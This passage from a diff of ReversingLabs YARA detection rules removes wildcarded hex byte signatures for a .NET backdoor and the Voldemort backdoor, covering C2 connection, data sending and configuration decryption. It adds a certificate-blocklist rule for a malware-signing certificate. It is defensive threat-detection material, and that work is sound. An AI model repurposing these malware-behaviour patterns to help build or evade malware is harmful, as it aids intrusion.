-        ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-        11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 80 ??
-        ?? ?? ?? 00 38 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ??
-        00 00 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 7E ??
-        ?? ?? ?? 28 ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 17 28 ?? ?? ??
-        ?? 26 14 80 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00
-        16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 2B ?? 00 17 80 ??
-        ?? ?? ?? 38 ?? ?? ?? ?? 00
-    }
-		$connect_v2 = {
-        16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ??
-        ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 14 80 ?? ?? ?? ?? DE ??
-        26 DE ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 73 ?? ?? ?? ??
-        80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ??
-        ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20
-        10 27 00 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ??
-        ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 80
-        ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 72 ??
-        ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 07 7F ?? ?? ?? ?? 28
-        ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 2B ?? 07 0C 72 ?? ?? ?? ?? 72 ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 08 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
-        ?? ?? 0B 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 07 A2 11 ?? 17 7E ?? ?? ?? ?? A2 11 ?? 18
-        72 ?? ?? ?? ?? A2 11 ?? 19 7E ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ??
-        ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B
-        07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 12 ?? 28 ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? DE ?? 26 16 80 ?? ?? ?? ?? DE ??
-        DE ?? 11 ?? 28 ?? ?? ?? ?? DC 7E
-    }
-		$receive_v2 = {
-        72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 07 17 D6
-        0B 07 1F ?? 33 ?? 16 0B 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 6F ?? ?? ?? ?? 17 3C ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ??
-        ?? 26 38 ?? ?? ?? ?? 06 15 6A 3B ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 8D
-        ?? ?? ?? ?? 80 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0C 7E ?? ?? ?? ?? 8E
-        69 6A 08 31 ?? 08 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F
-        ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 16 6F ?? ?? ?? ?? 0D 7E ?? ?? ??
-        ?? 7E ?? ?? ?? ?? 16 09 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 40 ?? ?? ??
-        ?? 15 6A 0A 7E ?? ?? ?? ?? 2D ?? 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ??
-        ?? ?? 7E ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-        ?? ?? ?? ?? 11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ??
-        ?? 80 ?? ?? ?? ?? 38 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ??
-        6F ?? ?? ?? ?? 13 ?? 11 ?? 15 2E ?? 11 ?? 2C ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12
-        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 28
-        ?? ?? ?? ?? 0A 06 16 6A 33 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15 6A 0A 7E ?? ?? ??
-        ?? 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? DE
-        ?? 26 DE ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ??
-        14 14 14 17 28 ?? ?? ?? ?? 26 14 80 ?? ?? ?? ?? DE ?? 26 DE ?? 16 80 ?? ?? ?? ?? 28
-        ?? ?? ?? ?? 2C ?? 17 80
-    }
-		$get_system_information_v2_p1 = {
-        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 0B 7F ?? ?? ?? ?? 28 ?? ?? ?? ??
-        72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 07 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 0D 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-        ?? 09 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 13 ?? 28 ??
-        ?? ?? ?? 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06
-        28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ??
-        ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE
-        ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 7E ?? ?? ?? ?? 6F
-        ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E
-        ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ??
-        ?? 0A DE ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 28
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 28 ?? ?? ??
-        ?? 0A DE ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ??
-        ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 33 ?? 06 72 ?? ?? ?? ?? 28 ?? ??
-        ?? ?? 0A 06 11 ?? 11 ?? 8E 69 17 DA 9A 28 ?? ?? ?? ?? 0A DE ?? 26 06 72
-    }
-		$get_system_information_v2_p2 = {
-        28 ?? ?? ?? ?? 0A DE ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06
-        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 28 ?? ?? ??
-        ?? 2C ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ??
-        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A
-        06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ??
-        28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ??
-        28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A
-        13 ?? 11 ?? 6F ?? ?? ?? ?? 1F ?? 33 ?? 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-        ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 06 11 ?? 28
-    }
-		$send_v2 = {
-        7E ?? ?? ?? ?? 2D ?? 16 2A 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 2D ?? 16 13 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 02 8E 69 13 ?? 12 ?? 28 ?? ?? ??
-        ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 12 ?? 28 ?? ?? ?? ?? 0D 07 09 16 09 8E 69 6F ??
-        ?? ?? ?? 07 02 16 02 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ??
-        ?? ?? 16 07 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 11 ?? 28
-        ?? ?? ?? ?? DC DE ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 16 80 ?? ?? ??
-        ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 28 ?? ?? ?? ?? DE ?? 7E ?? ?? ?? ??
-        2A 11
-    }
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $persistence_mechanism_v1_p* ) ) and ( all of ( $connect_v1_p* ) ) and ( $send_v1 ) and ( all of ( $receive_v1_p* ) ) ) or ( ( $connect_v2 ) and ( $receive_v2 ) and ( all of ( $get_system_information_v2_p* ) ) and ( $send_v2 ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures [ i ] . serial == "46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" and 1643846400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Backdoor_Voldemort : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Voldemort backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d770bd79-5141-50a0-8cf7-bca1cf5f23e1"
-		date = "2024-10-09"
-		modified = "2024-10-09"
+		id = "918fa696-5c92-551b-a87b-6410a6dc718a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Win64.Backdoor.Voldemort.yara#L1-L208"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1fe2abe17436d2965e34d1f10223af50d9600809fdef234e7d89c74fa33228a9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10480-L10496"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bce92750f71477ecfa7b8213724344708066c0e6133a47cd6758bbd9f8f9da5f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Voldemort"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$decrypt_configuration_p1 = {
-            4C 8B DC 55 56 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 49
-            89 5B ?? 33 F6 49 89 7B ?? 4D 89 6B ?? 48 89 4C 24 ?? 66 C7 44 24 ?? ?? ?? C6 44 24
-            ?? ?? E8 ?? ?? ?? ?? 4C 8B E8 8B FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B E8 48 85 C0
-            0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 85 C0 0F
-            84 ?? ?? ?? ?? 45 33 C9 48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B
-            CD C7 44 24 ?? ?? ?? ?? ?? 45 8D 41 ?? FF D0 48 89 44 24 ?? 48 8B F8 48 83 F8 ?? 0F
-            84 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 33 D2 48 8B CF FF D0 44 8B E0 EB
-            ?? 44 8B E6 89 74 24 ?? FF 15 ?? ?? ?? ?? 45 8B C4 BA ?? ?? ?? ?? 48 8B C8 FF 15 ??
-            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 8B F0 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0
-            74 ?? 4C 8D 4C 24 ?? 48 89 74 24 ?? 45 8B C4 49 8B D6 48 8B CF FF D0 8B FE 45 85 E4
-            0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 44 8B C6 48 8D 54 24
-        }
-		$decrypt_configuration_p2 = {
-            0F 1F 84 00 ?? ?? ?? ?? 0F B6 0A 8B C7 FF C7 42 3A 0C 30 0F 85 ?? ?? ?? ?? 41 FF C0
-            48 FF C2 41 83 F8 ?? 72 ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 42 8B 2C 37 4C 89 BC 24 ?? ??
-            ?? ?? 8D 5D ?? FF 15 ?? ?? ?? ?? 44 8B C3 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ??
-            48 8B D8 85 ED 74 ?? 8D 47 ?? 03 C5 41 3B C4 73 ?? 49 8D 56 ?? 44 8B C5 48 03 D7 48
-            8B CB E8 ?? ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 66 90 49 FF C0 43
-            38 34 28 75 ?? 85 ED 7E ?? 4C 8B CB 8B C6 4D 8D 49 ?? 99 FF C6 41 F7 F8 48 63 C2 42
-            0F B6 14 28 41 30 51 ?? 3B F5 7C ?? 48 8B 4C 24 ?? 4C 8B C5 48 8B D3 E8 ?? ?? ?? ??
-            48 8B 6C 24 ?? BE ?? ?? ?? ?? EB ?? 41 3B FC 0F 82 ?? ?? ?? ?? 48 8B DE 4C 8B A4 24
-            ?? ?? ?? ?? 4D 85 F6 74 ?? FF 15 ?? ?? ?? ?? 4D 8B C6 33 D2 48 8B C8 FF 15 ?? ?? ??
-            ?? 4C 8B B4 24 ?? ?? ?? ?? 48 85 DB 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C3 33 D2 48 8B C8
-            FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
-            ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B
-            D0 48 8B CB E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B CF FF D0 48
-            8B BC 24 ?? ?? ?? ?? 48 85 ED 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C5 33 D2 48 8B C8 FF 15
-            ?? ?? ?? ?? 8B C6 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E 5D
-            C3
-        }
-		$decryption_algorithm = {
-            40 53 48 83 EC ?? 0F B6 01 48 8B D9 84 C0 0F 84 ?? ?? ?? ?? 48 FF C3 48 89 7C 24 ??
-            4C 8B C9 8B F8 3C ?? 72 ?? 83 E7 ?? B9 ?? ?? ?? ?? 0F 1F 00 0F B6 13 48 FF C3 8B C2
-            83 E0 ?? D3 E0 83 C1 ?? 0B F8 80 FA ?? 73 ?? 33 C0 4C 8B C3 4D 2B C1 4C 3B CB 4C 0F
-            47 C0 4D 85 C0 74 ?? 33 D2 49 8B C9 E8 ?? ?? ?? ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ??
-            85 C0 7E ?? 48 89 74 24 ?? 48 8B FB 8B F0 66 90 48 8B D7 E8 ?? ?? ?? ?? 48 83 C7 ??
-            48 83 EE ?? 75 ?? 48 8B 74 24 ?? 48 8B C3 48 8B 7C 24 ?? 48 83 C4 ?? 5B C3 48 8B 7C
-            24 ?? 48 8B C3 48 83 C4 ?? 5B C3
-        }
-		$request_access_token_p1 = {
-            40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
-            33 C4 48 89 84 24 ?? ?? ?? ?? 33 C0 4C 89 4C 24 ?? 33 FF 48 89 44 24 ?? 0F 57 C0 89
-            7C 24 ?? 48 C7 C3 ?? ?? ?? ?? 8B F7 49 8B E8 4C 8B FA 4C 8B F1 48 8B C3 0F 11 44 24
-            ?? 48 FF C0 42 38 34 00 75 ?? 48 8B CB 48 FF C1 40 38 34 0A 75 ?? 48 03 C1 48 8B CB
-            48 FF C1 41 38 34 0E 75 ?? 48 03 C1 4C 8D 24 C5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4D 8B
-            C4 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 74 ?? 48 89 6C 24 ??
-            4C 8D 05 ?? ?? ?? ?? 4D 8B CE 4C 89 7C 24 ?? 49 8B D4 48 8B C8 E8 ?? ?? ?? ?? 4C 8D
-            0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 85 C0 75 ?? 48
-            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 8D 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CD FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48
-            8B 6C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CD 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? FF D0
-        }
-		$request_access_token_p2 = {
-            85 C0 0F 84 ?? ?? ?? ?? 49 8B D5 48 8B CD E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ??
-            ?? ?? ?? 48 8B D3 66 90 48 FF C2 40 38 3C 10 75 ?? 48 FF C2 48 8B C8 E8 ?? ?? ?? ??
-            4C 8B F0 48 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 85
-            C0 74 ?? 83 78 ?? ?? 75 ?? 48 8B 48 ?? 48 8B FB 80 7C 39 ?? ?? 48 8D 7F ?? 75 ?? FF
-            15 ?? ?? ?? ?? 4C 8D 47 ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 ?? 4C
-            8B C3 48 8B F8 0F 1F 00 49 FF C0 42 80 3C 02 ?? 75 ?? 49 FF C0 48 8B C8 E8 ?? ?? ??
-            ?? 49 8B CE E8 ?? ?? ?? ?? 48 85 FF 74 ?? 80 7C 1F ?? ?? 48 8D 5B ?? 75 ?? 48 8D 53
-            ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B 4C 24 ?? BB ?? ?? ?? ?? 48 89 01 EB ?? 8B 5C 24 ??
-            EB ?? 8B DF EB ?? 8B DE 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4D 85 ED 74 ?? FF 15 ?? ?? ??
-            ?? 4D 8B C5 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 85 F6 74 ?? FF 15 ?? ?? ?? ?? 4C 8B
-            C6 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C7 33 D2
-            48 8B C8 FF 15 ?? ?? ?? ?? 8B C3 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48
-            81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D 5B C3
-        }
-		$network_communication_p1 = {
-            40 53 56 57 41 54 41 56 41 57 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24
-            ?? 8B 35 ?? ?? ?? ?? 48 8B F9 48 8D 0D ?? ?? ?? ?? 4D 8B E1 4D 8B F8 4C 8B F2 E8 ??
-            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? 48 89 6C 24 ?? E8 ??
-            ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 33 DB 48 85 C0 0F 84 ?? ?? ?? ?? 45 33
-            C9 89 5C 24 ?? 45 33 C0 48 8D 0D ?? ?? ?? ?? 8B D6 FF D0 48 89 07 48 8B E8 48 85 C0
-            0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 48 85 C0
-            0F 84 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 45 33 C9 49 8B D6 48 8B CD FF D0 48 89 47 ?? 48
-        }
-		$network_communication_p2 = {
-            8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
-            ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
-            ?? ?? ?? 48 8B F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ??
-            ?? ?? 48 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 4D 8B C7 49 8B
-            D4 48 89 5C 24 ?? 48 8B CD FF D0 48 8B D8 48 8D 0D ?? ?? ?? ?? 48 89 5F ?? C7 44 24
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8D
-            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B D0 48 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 41 B9 ?? ?? ?? ??
-            4C 8D 44 24 ?? 48 8B CB 41 8D 51 ?? FF D0 B8 ?? ?? ?? ?? EB ?? 48 89 5F ?? EB ?? 48
-            89 1F 33 C0 48 8B 6C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 83 C4 ?? 41 5F
-            41 5E 41 5C 5F 5E 5B C3
-        }
-		$download_data_from_c2_p1 = {
-            4C 8B DC 55 56 57 49 8D AB ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
-            33 C4 48 89 85 ?? ?? ?? ?? 49 89 5B ?? 33 FF 4D 89 63 ?? 48 8B D9 4D 89 6B ?? 48 8D
-            0D ?? ?? ?? ?? 4D 8B E8 4D 89 73 ?? 0F 57 C0 4D 89 7B ?? 33 C0 4C 8D 67 ?? 4D 8B C1
